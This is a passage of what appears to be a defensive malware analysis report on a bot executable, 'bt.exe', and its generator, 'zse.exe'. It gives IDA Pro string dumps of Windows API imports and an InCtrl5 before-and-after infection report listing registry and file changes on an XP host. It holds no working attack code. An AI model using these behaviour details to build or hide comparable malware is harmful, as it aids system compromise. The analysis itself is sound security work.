.text:0041C3CC 00000014 C DlgDirListComboBoxW
.text:0041C3E0 00000014 C DlgDirListComboBoxA
.text:0041C3F4 0000000C C DlgDirListA
.text:0041C400 00000011 C DispatchMessageW
.text:0041C414 00000011 C DispatchMessageA
.text:0041C428 00000010 C DialogBoxParamW
.text:0041C438 00000010 C DialogBoxParamA
.text:0041C448 00000018 C DialogBoxIndirectParamW
.text:0041C460 00000018 C DialogBoxIndirectParamA
.text:0041C478 0000000E C DestroyWindow
.text:0041C488 0000000C C DestroyMenu
.text:0041C494 0000000C C DestroyIcon
.text:0041C4A0 0000000E C DestroyCursor
.text:0041C4B0 0000000D C DestroyCaret
.text:0041C4C0 00000018 C DestroyAcceleratorTable
.text:0041C4D8 0000000B C DeleteMenu
.text:0041C4E4 0000000F C DeferWindowPos
.text:0041C4F4 0000000F C DefWindowProcW
.text:0041C504 0000000F C DefWindowProcA
.text:0041C514 00000011 C DefMDIChildProcW
.text:0041C528 00000011 C DefMDIChildProcA
.text:0041C53C 0000000E C DefFrameProcW
.text:0041C54C 0000000E C DefFrameProcA
.text:0041C55C 0000000C C DefDlgProcW
.text:0041C568 0000000C C DefDlgProcA
.text:0041C574 00000010 C DdeUninitialize
.text:0041C584 00000010 C DdeUnaccessData
.text:0041C594 00000011 C DdeSetUserHandle
.text:0041C5A8 00000017 C DdeSetQualityOfService
.text:0041C5C0 0000000D C DdeReconnect
.text:0041C5D0 00000010 C DdeQueryStringW
.text:0041C5E0 00000010 C DdeQueryStringA
.text:0041C5F0 00000013 C DdeQueryNextServer
.text:0041C604 00000011 C DdeQueryConvInfo
.text:0041C618 0000000E C DdePostAdvise
.text:0041C628 0000000F C DdeNameService
.text:0041C638 00000014 C DdeKeepStringHandle
.text:0041C64C 0000000F C DdeInitializeW
.text:0041C65C 0000000F C DdeInitializeA
.text:0041C66C 00000015 C DdeImpersonateClient
.text:0041C684 00000010 C DdeGetLastError
.text:0041C694 0000000B C DdeGetData
.text:0041C6A0 00000014 C DdeFreeStringHandle
.text:00421A2C 0000000E C GetBinaryType
.text:00421A3C 0000000D C GetAtomNameW
.text:00421A4C 0000000D C GetAtomNameA
.text:00421A5C 00000007 C GetACP
.text:00421A64 00000019 C GenerateConsoleCtrlEvent
.text:00421A80 0000000D C FreeResource
.text:00421A90 00000019 C FreeLibraryAndExitThread
.text:00421AAC 0000000C C FreeLibrary
.text:00421AB8 00000018 C FreeEnvironmentStringsW
.text:00421AD0 00000018 C FreeEnvironmentStringsA
.text:00421AE8 0000000C C FreeConsole
.text:00421AF4 0000000F C FormatMessageW
.text:00421B04 0000000F C FormatMessageA
.text:00421B14 0000000C C FoldStringW
.text:00421B20 0000000C C FoldStringA
.text:00421B2C 00000010 C FlushViewOfFile
.text:00421B3C 00000016 C FlushInstructionCache
.text:00421B54 00000011 C FlushFileBuffers
.text:00421B68 00000018 C FlushConsoleInputBuffer
.text:00421B80 0000000E C FindResourceW
.text:00421B90 00000010 C FindResourceExW
.text:00421BA0 00000010 C FindResourceExA
.text:00421BB0 0000000E C FindResourceA
.text:00421BC0 0000000E C FindNextFileW
.text:00421BD0 0000000E C FindNextFileA
.text:00421BE0 0000001B C FindNextChangeNotification
.text:00421BFC 0000000F C FindFirstFileW
.text:00421C0C 00000011 C FindFirstFileExW
.text:00421C20 00000011 C FindFirstFileExA
.text:00421C34 0000000F C FindFirstFileA
.text:00421C44 0000001D C FindFirstChangeNotificationW
.text:00421C64 0000001D C FindFirstChangeNotificationA
.text:00421C84 0000001C C FindCloseChangeNotification
.text:00421CA0 0000000A C FindClose
.text:00421CAC 0000000A C FindAtomW
.text:00421CB8 0000000A C FindAtomA
.text:00421CC4 0000001C C FillConsoleOutputCharacterW
.text:00421CE0 0000001C C FillConsoleOutputCharacterA
.text:00421CFC 0000001B C FillConsoleOutputAttribute
.text:00421D18 00000015 C FileTimeToSystemTime
.text:00421D30 00000018 C FileTimeToLocalFileTime
.text:00421D48 00000016 C FileTimeToDosDateTime
.text:00421D60 0000000A C FatalExit
.text:00421D6C 0000000E C FatalAppExitW
.text:00421D7C 0000000E C FatalAppExitA
.text:00421D8C 0000001A C ExpandEnvironmentStringsW
.text:00421DA8 0000001A C ExpandEnvironmentStringsA
.text:00421DC4 0000000C C ExitProcess
.text:00421DD0 00000013 C EscapeCommFunction
.text:00421DE4 0000000A C EraseTape
.text:00421DF0 00000011 C EnumTimeFormatsW
.text:00421E04 00000011 C EnumTimeFormatsA
.text:00421E18 00000013 C EnumSystemLocalesW
.text:00421E2C 00000013 C EnumSystemLocalesA
.text:00421E40 00000015 C EnumSystemCodePagesW
.text:00421E58 00000015 C EnumSystemCodePagesA
.text:00421E70 00000013 C EnumResourceTypesW
.text:00421E84 00000013 C EnumResourceTypesA
.text:00421E98 00000013 C EnumResourceNamesW
.text:00421EAC 00000013 C EnumResourceNamesA
.text:00421EC0 00000017 C EnumResourceLanguagesW
.text:00421ED8 00000017 C EnumResourceLanguagesA
.text:00421EF0 00000011 C EnumDateFormatsW
.text:00421F04 00000013 C EnumDateFormatsExW
.text:00421F18 00000013 C EnumDateFormatsExA
.text:00421F2C 00000011 C EnumDateFormatsA
.text:00421F40 00000012 C EnumCalendarInfoW
.text:00421F54 00000014 C EnumCalendarInfoExW
.text:00421F68 00000014 C EnumCalendarInfoExA
.text:00421F7C 00000012 C EnumCalendarInfoA
.text:0041C6B4 00000012 C DdeFreeDataHandle
.text:0041C6C8 00000012 C DdeEnableCallback
.text:0041C6DC 00000012 C DdeDisconnectList
.text:0041C6F0 0000000E C DdeDisconnect
.text:0041C700 00000017 C DdeCreateStringHandleW
.text:0041C718 00000017 C DdeCreateStringHandleA
.text:0041C730 00000014 C DdeCreateDataHandle
.text:0041C744 0000000F C DdeConnectList
.text:0041C754 0000000B C DdeConnect
.text:0041C760 00000014 C DdeCmpStringHandles
.text:0041C774 00000015 C DdeClientTransaction
.text:0041C78C 0000000B C DdeAddData
.text:0041C798 0000000E C DdeAccessData
.text:0041C7A8 00000016 C DdeAbandonTransaction
.text:0041C7C0 00000015 C CreateWindowStationW
.text:0041C7D8 00000015 C CreateWindowStationA
.text:0041C7F0 00000010 C CreateWindowExW
.text:0041C800 00000010 C CreateWindowExA
.text:0041C810 00000010 C CreatePopupMenu
.text:0041C820 0000000B C CreateMenu
.text:0041C82C 00000011 C CreateMDIWindowW
.text:0041C840 00000011 C CreateMDIWindowA
.text:0041C854 00000013 C CreateIconIndirect
.text:0041C868 00000019 C CreateIconFromResourceEx
.text:0041C884 00000017 C CreateIconFromResource
.text:0041C89C 0000000B C CreateIcon
.text:0041C8A8 00000013 C CreateDialogParamW
.text:0041C8BC 00000013 C CreateDialogParamA
.text:0041C8D0 0000001B C CreateDialogIndirectParamW
.text:0041C8EC 0000001B C CreateDialogIndirectParamA
.text:0041C908 0000000F C CreateDesktopW
.text:0041C918 0000000F C CreateDesktopA
.text:0041C928 0000000D C CreateCursor
.text:0041C938 0000000C C CreateCaret
.text:0041C944 00000018 C CreateAcceleratorTableW
.text:0041C95C 00000018 C CreateAcceleratorTableA
.text:0041C974 00000016 C CountClipboardFormats
.text:0041C98C 00000009 C CopyRect
.text:0041C998 0000000A C CopyImage
.text:0041C9A4 00000009 C CopyIcon
.text:0041C9B0 00000016 C CopyAcceleratorTableW
.text:0041C9C8 00000016 C CopyAcceleratorTableA
.text:0041C9E0 00000013 C CloseWindowStation
.text:0041C9F4 0000000C C CloseWindow
.text:0041CA00 0000000D C CloseDesktop
.text:0041CA10 0000000F C CloseClipboard
.text:0041CA20 0000000B C ClipCursor
.text:0041CA2C 0000000F C ClientToScreen
.text:0041CA3C 00000017 C ChildWindowFromPointEx
.text:0041CA54 00000015 C ChildWindowFromPoint
.text:0041CA6C 00000011 C CheckRadioButton
.text:0041CA80 00000013 C CheckMenuRadioItem
.text:0041CA94 0000000E C CheckMenuItem
.text:0041CAA4 0000000F C CheckDlgButton
.text:0041CAB4 0000000B C CharUpperW
.text:0041CAC0 0000000F C CharUpperBuffW
.text:0041CAD0 0000000F C CharUpperBuffA
.text:0041CAE0 0000000B C CharUpperA
.text:0041CAEC 0000000B C CharToOemW
.text:0041CAF8 0000000F C CharToOemBuffW
.text:0041CB08 0000000F C CharToOemBuffA
.text:0041CB18 0000000B C CharToOemA
.text:0041CB24 0000000A C CharPrevW
.text:0041CB30 0000000C C CharPrevExA
.text:0041CB3C 0000000A C CharPrevA
.text:0041CB48 0000000A C CharNextW
.text:0041CB54 0000000C C CharNextExA
.text:0041CB60 0000000A C CharNextA
.text:0041CB6C 0000000B C CharLowerW
.text:0041CB78 0000000F C CharLowerBuffW
.text:00421F90 00000013 C EndUpdateResourceW
.text:00421FA4 00000013 C EndUpdateResourceA
.text:00421FB8 00000010 C DuplicateHandle
.text:00421FC8 00000016 C DosDateTimeToFileTime
.text:00421FE0 00000014 C DisconnectNamedPipe
.text:00421FF4 0000001A C DisableThreadLibraryCalls
.text:00422010 00000010 C DeviceIoControl
.text:00422020 0000000C C DeleteFileW
.text:0042202C 0000000C C DeleteFileA
.text:00422038 0000000C C DeleteFiber
.text:00422044 0000000B C DeleteAtom
.text:00422050 00000011 C DefineDosDeviceW
.text:00422064 00000011 C DefineDosDeviceA
.text:00422078 0000000B C DebugBreak
.text:00422084 00000013 C DebugActiveProcess
.text:00422098 00000015 C CreateWaitableTimerW
.text:004220B0 00000015 C CreateWaitableTimerA
.text:004220C8 00000019 C CreateToolhelp32Snapshot
.text:004220E4 0000000D C CreateThread
.text:004220F4 00000014 C CreateTapePartition
.text:00422108 00000011 C CreateSemaphoreW
.text:0042211C 00000011 C CreateSemaphoreA
.text:00422130 00000013 C CreateRemoteThread
.text:00422144 0000000F C CreateProcessW
.text:00422154 0000000F C CreateProcessA
.text:00422164 0000000B C CreatePipe
.text:00422170 00000011 C CreateNamedPipeW
.text:00422184 00000011 C CreateNamedPipeA
.text:00422198 0000000D C CreateMutexW
.text:004221A8 0000000D C CreateMutexA
.text:004221B8 00000010 C CreateMailslotW
.text:004221C8 00000010 C CreateMailslotA
.text:004221D8 00000017 C CreateIoCompletionPort
.text:004221F0 0000000C C CreateFileW
.text:004221FC 00000013 C CreateFileMappingW
.text:00422210 00000013 C CreateFileMappingA
.text:00422224 0000000C C CreateFileA
.text:00422230 0000000C C CreateFiber
.text:0042223C 0000000D C CreateEventW
.text:0042224C 0000000D C CreateEventA
.text:0042225C 00000011 C CreateDirectoryW
.text:00422270 00000013 C CreateDirectoryExW
.text:00422284 00000013 C CreateDirectoryExA
.text:00422298 00000011 C CreateDirectoryA
.text:004222AC 0000001A C CreateConsoleScreenBuffer
.text:004222C8 0000000A C CopyFileW
.text:004222D4 0000000C C CopyFileExW
.text:004222E0 0000000C C CopyFileExA
.text:004222EC 0000000A C CopyFileA
.text:004222F8 00000015 C ConvertThreadToFiber
.text:00422310 00000015 C ConvertDefaultLocale
.text:00422328 00000013 C ContinueDebugEvent
.text:0042233C 00000011 C ConnectNamedPipe
.text:00422350 0000000F C CompareStringW
.text:00422360 0000000F C CompareStringA
.text:00422370 00000010 C CompareFileTime
.text:00422380 00000012 C CommConfigDialogW
.text:00422394 00000012 C CommConfigDialogA
.text:004223A8 0000000C C CloseHandle
.text:004223B4 0000000F C ClearCommError
.text:004223C4 0000000F C ClearCommBreak
.text:004223D4 00000014 C CancelWaitableTimer
.text:004223E8 00000009 C CancelIo
.text:004223F4 0000001A C CancelDeviceWakeupRequest
.text:00422410 0000000F C CallNamedPipeW
.text:00422420 0000000F C CallNamedPipeA
.text:00422430 0000000E C BuildCommDCBW
.text:00422440 00000019 C BuildCommDCBAndTimeoutsW
.text:0042245C 00000019 C BuildCommDCBAndTimeoutsA
.text:00422478 0000000E C BuildCommDCBA
.text:0041CB88 0000000F C CharLowerBuffA
.text:0041CB98 0000000B C CharLowerA
.text:0041CBA4 0000000C C ChangeMenuW
.text:0041CBB0 0000000C C ChangeMenuA
.text:0041CBBC 00000017 C ChangeDisplaySettingsW
.text:0041CBD4 00000019 C ChangeDisplaySettingsExW
.text:0041CBF0 00000019 C ChangeDisplaySettingsExA
.text:0041CC0C 00000017 C ChangeDisplaySettingsA
.text:0041CC24 00000015 C ChangeClipboardChain
.text:0041CC3C 0000000F C CascadeWindows
.text:0041CC4C 00000014 C CascadeChildWindows
.text:0041CC60 00000010 C CallWindowProcW
.text:0041CC70 00000010 C CallWindowProcA
.text:0041CC80 0000000F C CallNextHookEx
.text:0041CC90 0000000F C CallMsgFilterW
.text:0041CCA0 0000000F C CallMsgFilterA
.text:0041CCB0 0000000E C CallMsgFilter
.text:0041CCC0 00000018 C BroadcastSystemMessageW
.text:0041CCD8 00000018 C BroadcastSystemMessageA
.text:0041CCF0 00000017 C BroadcastSystemMessage
.text:0041CD08 00000011 C BringWindowToTop
.text:0041CD1C 0000000B C BlockInput
.text:0041CD28 0000000B C BeginPaint
.text:0041CD34 00000014 C BeginDeferWindowPos
.text:0041CD48 00000012 C AttachThreadInput
.text:0041CD5C 00000015 C ArrangeIconicWindows
.text:0041CD74 0000000C C AppendMenuW
.text:0041CD80 0000000C C AppendMenuA
.text:0041CD8C 00000009 C AnyPopup
.text:0041CD98 0000000E C AnimateWindow
.text:0041CDA8 00000013 C AdjustWindowRectEx
.text:0041CDBC 00000011 C AdjustWindowRect
.text:0041CDD0 00000016 C UnlockServiceDatabase
.text:0041CDE8 00000017 C TrusteeAccessToObjectW
.text:0041CE00 00000017 C TrusteeAccessToObjectA
.text:0041CE18 0000000E C StartServiceW
.text:0041CE28 0000001C C StartServiceCtrlDispatcherW
.text:0041CE44 0000001C C StartServiceCtrlDispatcherA
.text:0041CE60 0000000E C StartServiceA
.text:0041CE70 00000014 C SetTokenInformation
.text:0041CE84 0000000F C SetThreadToken
.text:0041CE94 00000011 C SetServiceStatus
.text:0041CEA8 00000019 C SetServiceObjectSecurity
.text:0041CEC4 0000000F C SetServiceBits
.text:0041CED4 00000013 C SetSecurityInfoExW
.text:0041CEE8 00000013 C SetSecurityInfoExA
.text:0041CEFC 00000010 C SetSecurityInfo
.text:0041CF0C 0000001A C SetSecurityDescriptorSacl
.text:0041CF28 0000001B C SetSecurityDescriptorOwner
.text:0041CF44 0000001B C SetSecurityDescriptorGroup
.text:0041CF60 0000001A C SetSecurityDescriptorDacl
.text:0041CF7C 00000019 C SetPrivateObjectSecurity
.text:0041CF98 00000016 C SetNamedSecurityInfoW
.text:0041CFB0 00000018 C SetNamedSecurityInfoExW
.text:0041CFC8 00000018 C SetNamedSecurityInfoExA
.text:0041CFE0 00000016 C SetNamedSecurityInfoA
.text:0041CFF8 00000018 C SetKernelObjectSecurity
.text:0041D010 00000011 C SetFileSecurityW
.text:0041D024 00000011 C SetFileSecurityA
.text:0041D038 00000017 C SetEntriesInAuditListW
.text:0041D050 00000017 C SetEntriesInAuditListA
.text:0041D068 00000011 C SetEntriesInAclW
.text:0041D07C 00000011 C SetEntriesInAclA
.text:0041D090 00000018 C SetEntriesInAccessListW
.text:0041D0A8 00000018 C SetEntriesInAccessListA
.text:0041D0C0 00000012 C SetAclInformation
.text:0041D0D4 0000000D C RevertToSelf
.text:0041D0E4 0000000D C ReportEventW
.text:0041D0F4 0000000D C ReportEventA
.text:0041D104 0000001C C RegisterServiceCtrlHandlerW
.text:00422488 00000015 C BeginUpdateResourceW
.text:004224A0 00000015 C BeginUpdateResourceA
.text:004224B8 00000005 C Beep
.text:004224C0 0000000C C BackupWrite
.text:004224CC 0000000B C BackupSeek
.text:004224D8 0000000B C BackupRead
.text:004224E4 00000010 C AreFileApisANSI
.text:004224F4 0000000D C AllocConsole
.text:00422504 00000009 C AddAtomW
.text:00422510 00000009 C AddAtomA
.text:00422520 00000006 C entry
.text:00422528 0000000D C imagehlp.dll
.text:00422538 00000013 C CheckSumMappedFile
.text:0042254C 00000005 C DanS
.text:00422554 00000005 C Rich
.text:0042255C 00000006 C .text
.text:00422564 00000007 C .rdata
.text:0042256C 00000006 C .data
.text:00428776 0000000A C WriteFile
.text:00428782 00000009 C ReadFile
.text:0042878C 0000000C C CreateFileW
.text:0042879A 0000000B C OpenMutexW
.text:004287A6 00000018 C SetNamedPipeHandleState
.text:004287C0 0000000C C HeapReAlloc
.text:0042885C 00000014 C MultiByteToWideChar
.text:00428872 0000000E C GetFileSizeEx
.text:00428882 00000013 C CreateFileMappingW
.text:00428896 00000013 C SetFileAttributesW
.text:004288AA 0000000D C CreateThread
.text:004288B8 0000000C C CloseHandle
.text:004288C6 00000006 C Sleep
.text:004288CE 00000011 C GetModuleHandleA
.text:004288E0 0000000D C LoadLibraryA
.text:004288EE 0000000F C GetProcAddress
.text:004288FE 00000013 C GetModuleFileNameW
.text:00428912 0000000C C ExitProcess
.text:00428920 0000000A C lstrcmpiA
.text:0042892C 00000009 C lstrcpyW
.text:00428936 00000014 C WideCharToMultiByte
.text:0042894C 0000000C C DeleteFileW
.text:0042895A 0000000E C CryptHashData
.text:0042896A 00000011 C CryptDestroyHash
.text:0042897C 00000010 C CryptCreateHash
.text:0042898E 00000012 C CryptGetHashParam
.text:004289A2 00000014 C CryptReleaseContext
.text:004289B8 00000015 C CryptAcquireContextW
.text:004289CE 00000011 C GetSaveFileNameW
.text:004289E0 00000011 C GetOpenFileNameW
.text:004289F2 0000000E C OleInitialize
.text:00428A2C 00000014 C PathRemoveFileSpecW
.text:00428A60 00000012 C PathFindFileNameA
.text:00428A74 0000000D C PathCombineW
.text:00428A82 00000015 C GetWindowTextLengthW
.text:00428A98 0000000C C MessageBoxW
.text:00428AFC 00000013 C CreateDialogParamW
.text:00428B10 0000000B C GetDlgItem
.text:00428B1C 0000000F C SetWindowLongW
.text:00428B2C 00000010 C GetDlgItemTextW
.data:00429028 00000005 C ¯¦\bÖ
From the Ŗbt.exeŗ and the Ŗzse.exeŗ IDA Pro details we can conclude that the client
malware generation is a lot of input driven functions that collect just about everything of
interest on the XP system. The generator of Ŗbt.exeŗ has few input driven files to support the
configuration file such as the encryption and file path functions. The Ŗzse.exeŗ has all the
functions and creates the collector Ŗbt.exeŗ inputs from its master library of functions. In the
generation of the Ŗbt.exe,ŗ the Ŗzse.exeŗ encrypted the configuration file details within the
Ŗbt.exeŗ comments. Those data variables cannot be distinguished. I highlighted the complete
section within the Ŗbt.exeŗ IDA Pro output file which covers this encrypted area of mention.
We can assume there are enough XP functions to take over the registry files and modify
anything on the system. It can do whatever the program wants to accomplish.
Other Quick Analysis
Process Explorer, Process Monitor, PsList, ListDLLs, TCPView and RootkitRevealer
(utilities from Sysinternals Suite)6 were used to see what other interesting comparisons could
be found from before and after the Ŗbt.exeŗ was executed on the host. InCtrl57 was also used
to see what it would find. A simple script Ŗkjk_before.batŗ file was made to execute these
tools in an orderly manner. The Ŗbeforeŗ and Ŗafterŗ files were analyzed with a tool called
WinMerge8 to do comparison of the before and after infection.
kjk_before.bat:
pslist > pslist_before.txt
listdlls > listdlls_before.txt
procmon
procexp
Tcpview
RootkitRevealer
The Sysinternals Suite was extracted and the Ŗkjk_before.batŗ was put into the same folder.
The Ŗkjk_before.batŗ was executed from within the same folder and the files output results
were saved into another folder called Ŗbeforeŗ after completing the batch process. Then the
program InCtrl5 was executed to launch the Ŗbt.exeŗ as part of the Ŗbeforeŗ and Ŗafterŗ
process. After InCtrl5 was completed the Ŗkjk_before.batŗ was executed to capture the same
information but now for the state of the host after it has been infected. The results of the file
outputs were put into a folder called Ŗafter.ŗ
6 http://technet.microsoft.com/en-us/sysinternals/bb842062
7 http://simontodd.com/2010/02/inctrl-5-application-analysys-tool-download-and-enjoy/
8 http://winmerge.org/
The next few tables represent the results of what was discovered.
InCtrl5:
Installation Report: bt
Generated by InCtrl5, version 1.0.0.0
Install program: C:\Documents and Settings\Kevin\Desktop\bt.exe
4/24/2011 8:02 PM
------------------------------------------------------------
Registry
********
Keys ignored: 0
---------------
* (none)
Keys added: 2
-------------
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\HTTP\Parameters\à
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\HTTP\Parameters\à
Keys deleted: 2
---------------
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\HTTP\Parameters\t
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\HTTP\Parameters\t
Values added: 1
---------------
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache "C:\Documents and
Settings\Kevin\Desktop\bt.exe"
Type: REG_SZ
Data: bt
Values changed: 19
------------------
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "AppData"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\NetworkService\Application Data
New data: C:\WINDOWS\system32\config\systemprofile\Application Data
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cache"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files
New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cookies"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\LocalService\Cookies
New data: C:\WINDOWS\system32\config\systemprofile\Cookies
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "History"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\NetworkService\Local Settings\History
New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\History
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
"SavedLegacySettings"
Old type: REG_BINARY
New type: REG_BINARY
Old data: 46, 00, 00, 00, 0C, 00, 00, 00, 01, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 04, 00, 00,
00, 00, 00, 00, 00, 60, CA, 45, 95, FD, E8, CB, 01, 03, 00, 00, 00, A9, FE, FB, AA, A9, FE, 73, 47, 0A, 00, 01, 10, 00, 00, 00, 00,
00, 00, 00, 00, 00, 00, 00, 00
New data: 46, 00, 00, 00, 0D, 00, 00, 00, 01, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 04, 00, 00,
00, 00, 00, 00, 00, 60, CA, 45, 95, FD, E8, CB, 01, 03, 00, 00, 00, A9, FE, FB, AA, A9, FE, 73, 47, 0A, 00, 01, 10, 00, 00, 00, 00,
00, 00, 00, 00, 00, 00, 00, 00
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "AppData"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\NetworkService\Application Data
New data: C:\WINDOWS\system32\config\systemprofile\Application Data
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cache"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files
New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cookies"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\LocalService\Cookies
New data: C:\WINDOWS\system32\config\systemprofile\Cookies
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "History"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\NetworkService\Local Settings\History
New data: C:\WINDOWS\system32\config\systemprofile\Local Settings\History
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
"SavedLegacySettings"
Old type: REG_BINARY
New type: REG_BINARY
Old data: 46, 00, 00, 00, 0C, 00, 00, 00, 01, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 04, 00, 00,
00, 00, 00, 00, 00, 60, CA, 45, 95, FD, E8, CB, 01, 03, 00, 00, 00, A9, FE, FB, AA, A9, FE, 73, 47, 0A, 00, 01, 10, 00, 00, 00, 00,
00, 00, 00, 00, 00, 00, 00, 00
New data: 46, 00, 00, 00, 0D, 00, 00, 00, 01, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 04, 00, 00,
00, 00, 00, 00, 00, 60, CA, 45, 95, FD, E8, CB, 01, 03, 00, 00, 00, A9, FE, FB, AA, A9, FE, 73, 47, 0A, 00, 01, 10, 00, 00, 00, 00,
00, 00, 00, 00, 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\RNG "Seed"
Old type: REG_BINARY
New type: REG_BINARY
Old data: CC, 90, 4A, 9F, 9B, DA, 48, D5, 27, 35, 0E, FD, 53, F6, 0D, FC, 6A, 3B, E4, 76, C7, E1, 6F, D6, 29,
85, D8, 01, 2F, A0, 8C, E0, 8B, 12, 95, 13, 68, 82, FC, C4, 41, DE, D9, 90, 41, AE, C3, B2, 52, 11, 99, FC, CB, 5B, 1D, E3, 1D,
E2, 17, A3, 1A, 34, 28, 42, ED, 02, 5A, 4C, 58, E1, 7C, DC, 30, 09, B1, 2C, 08, A2, 96, A2
New data: 7E, 4F, 14, E1, 46, 40, C9, 10, D8, 57, EE, 23, 5E, 8A, E2, B1, 7F, 24, 5A, 12, C4, F5, BE, 01, 37,
8C, 92, 94, 05, 7E, CF, AE, A9, 9F, BF, F4, F7, CA, DB, 6A, 91, 16, C2, 92, 54, 8E, 4D, DB, 83, 86, 93, A1, FE, 71, 93, 2F, E6,
75, D4, FE, C0, 38, FB, 3A, EE, 0B, 7B, 53, D2, BE, C9, E9, 26, 5A, 07, 1B, C8, AD, 73, 55
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Epoch "Epoch"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 6E, 01, 00, 00
New data: 70, 01, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{C13D5410-597B-4B3B-
A011-8BBF40B640BF} "DhcpRetryStatus"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 01, 00, 00, 00
New data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{DFD98CD7-D998-4BDE-
9EFE-D137415271B6} "DhcpRetryStatus"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 01, 00, 00, 00
New data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{DFD98CD7-D998-4BDE-
9EFE-D137415271B6} "DhcpRetryTime"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 25, 01, 00, 00
New data: 49, 01, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch "Epoch"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 6E, 01, 00, 00
New data: 70, 01, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{C13D5410-597B-
4B3B-A011-8BBF40B640BF} "DhcpRetryStatus"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 01, 00, 00, 00
New data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{DFD98CD7-D998-
4BDE-9EFE-D137415271B6} "DhcpRetryStatus"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 01, 00, 00, 00
New data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{DFD98CD7-D998-
4BDE-9EFE-D137415271B6} "DhcpRetryTime"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 25, 01, 00, 00
New data: 49, 01, 00, 00
------------------------------------------------------------
Disk contents
*************
Drives tracked: 1
-----------------
* c:\
Folders deleted: 1
------------------
c:\WINDOWS\system32\lowsec
Files deleted: 2
----------------
c:\WINDOWS\system32\lowsec\user.ds
Date: 4/24/2011 7:41 PM
Size: 2,423 bytes
c:\WINDOWS\system32\lowsec\user.ds.lll
Date: 3/23/2011 11:46 PM
Size: 1,377 bytes
Files changed: 21
-----------------
c:\Documents and Settings\Kevin\NTUSER.DAT.LOG
Old date: 4/24/2011 8:01 PM
New date: 4/24/2011 8:02 PM
Old size: 1,024 bytes
New size: 1,024 bytes
c:\Documents and Settings\Kevin\Cookies\index.dat
Old date: 4/24/2011 7:58 PM
New date: 4/24/2011 8:01 PM
Old size: 32,768 bytes
New size: 32,768 bytes
c:\Documents and Settings\Kevin\Local Settings\History\History.IE5\index.dat
Old date: 4/24/2011 7:58 PM
New date: 4/24/2011 8:01 PM
Old size: 49,152 bytes
New size: 49,152 bytes
c:\Documents and Settings\Kevin\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Old date: 4/24/2011 7:58 PM
New date: 4/24/2011 8:01 PM
Old size: 425,984 bytes
New size: 425,984 bytes
c:\Documents and Settings\LocalService\ntuser.dat.LOG
Old date: 4/24/2011 7:44 PM
New date: 4/24/2011 8:02 PM
Old size: 1,024 bytes
New size: 1,024 bytes
c:\Documents and Settings\LocalService\Local Settings\Temp\Cookies\index.dat
Old date: 4/24/2011 4:11 PM
New date: 4/24/2011 8:02 PM
Old size: 16,384 bytes
New size: 16,384 bytes
c:\Documents and Settings\LocalService\Local Settings\Temp\History\History.IE5\index.dat
Old date: 4/24/2011 4:11 PM
New date: 4/24/2011 8:02 PM
